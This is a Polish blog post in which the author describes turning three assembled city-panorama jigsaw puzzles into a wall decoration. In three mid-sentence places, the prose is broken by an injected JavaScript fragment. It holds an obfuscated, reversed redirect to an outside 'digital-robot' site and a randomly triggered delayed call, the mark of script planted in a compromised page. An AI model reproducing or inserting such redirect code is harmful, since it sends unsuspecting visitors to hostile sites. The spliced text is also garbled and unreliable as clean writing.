Dekoracja na ścianie dzięki puzzlom

 

Od dłuższego czasu myślałem nad tym, aby w jakiś sposób wypełnić moją pustą ścianę w pokoju. Będąc na kolacji u swojego znajomego, zauważyłem dosyć ciekawą dekorację. Dekoracja zrobiona ze złożonych, przyklejonych do tablicy korkowej puzzli. Stwierdziłem, że muszę mieć coś takiego u siebie.

Zrobienie świetnej dekoracji za pomocą puzzli

puzzle sklepNa początku, nie za bardzo wiedziałem jaki wzór będzie najlepiej pasował do moich kremowych ścian. Rozglądałem się za puzzlami, które przedstawiają obrazy znanych, wybitnych artystów, jednakże nic nie spodobałoby mi się na tyle, aby zagościło na mojej ścianie. Będąc w mieście, natknąłem się na dosyć ciekawe puzzle Sklep w którym je znalazłem posiadał bardzo wiele interesujących zestawów, więc zdecydowanie było w czym przebierać. Puzzle, które mnie najbardziej zaciekawiły przedstawiały panoramę miasta w USA. Zdjęcie było naprawdę bardzo ładne, jego kolory były bardzo ciepłe, przez co idealnie pasowały do mojej ściany i ogólnego wystroju mojego pokoju. Wziąłem je i po przejrzeniu jeszcze kilku zestawów, wybrałem jeszcze dwa. Wszystkie w podobnym stylu, panoramy miast w ciepłych kolorach. Ich cena była bardzo niska, nigdy nie spodziewałem się, że puzzle można kupić za tak niewielkie pieniądze. Układanie puzzli tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to naprawdę duża frajda, zwłaszcza, jeżeli robimy tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to z kimś. Ja osobiście układam puzzle ze swoją dziewczyną, gdyż tak jak i ja, jest miłośnikiem tego typu rzeczy.

Wykonane panoramy mieliśmy już po kilku tygodniach, zajęło nam tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wiele czasu i pochłonęło wiele wysiłku, jednakże efekt jest bardzo dobry. Mam świetne, trzy panoramy na ścianie, które świetnie pasują do mojego pokoju. Właśnie coś takiego mnie interesowało, przez co nie muszę już zastanawiać się co takiego zakupić, by ją zakryć.